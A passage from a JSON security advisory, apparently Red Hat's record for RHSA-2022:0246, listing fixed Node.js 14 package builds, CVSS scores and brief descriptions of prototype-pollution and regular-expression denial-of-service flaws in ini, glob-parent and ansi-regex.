"AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-28469", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945459" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-glob-parent. The enclosure regex used to check for glob enclosures containing backslashes is vulnerable to Regular Expression Denial of Service attacks. This flaw allows an attacker to cause a denial of service if they can supply a malicious string to the glob-parent function. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-glob-parent: Regular expression denial of service", "title": "Vulnerability summary" }, { "category": "other", "text": "While some components do package a vulnerable version of glob-parent, access to them requires OpenShift OAuth credentials and hence have been marked with a Low impact. This applies to the following products:\n - OpenShift Container Platform (OCP)\n - OpenShift ServiceMesh (OSSM)\n - Red Hat Advanced Cluster Management for Kubernetes (RHACM)\n - OpenShift distributed tracing", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28469" }, { "category": "external", "summary": "RHBZ#1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28469", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28469" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" } ], "release_date": "2021-01-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-glob-parent: Regular expression denial of service" }, { "cve": "CVE-2021-3807", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2007557" } ], "notes": [ { "category": "description", "text": "A regular expression denial of service (ReDoS) vulnerability was found in nodejs-ansi-regex. This could possibly cause an application using ansi-regex to use an excessive amount of CPU time when matching crafted ANSI escape codes.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw requires crafted invalid ANSI escape codes in order to be exploited and only allows for denial of service of applications on the client side, hence the impact has been rated as Moderate.\n\nIn Red Hat Virtualization and Red Hat Quay some components use a vulnerable version of ansi-regex. However, all frontend code is executed on the client side. As the maximum impact of this vulnerability is denial of service in the client, the vulnerability is rated Moderate for those products.\n\nOpenShift Container Platform 4 (OCP) ships affected version of ansi-regex in the ose-metering-hadoop container, however the metering operator is deprecated since 4.6[1]. This issue is not currently planned to be addressed in future updates and hence hadoop container has been marked as \u0027will not fix\u0027.\n\nAdvanced Cluster Management for Kubernetes (RHACM) ships the affected version of ansi-regex in several containers, however the impact of this vulnerability is deemed low as it would result in an authenticated slowing down their own user interface. \n\n[1] https://docs.openshift.com/container-platform/4.6/metering/metering-about-metering.html", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", 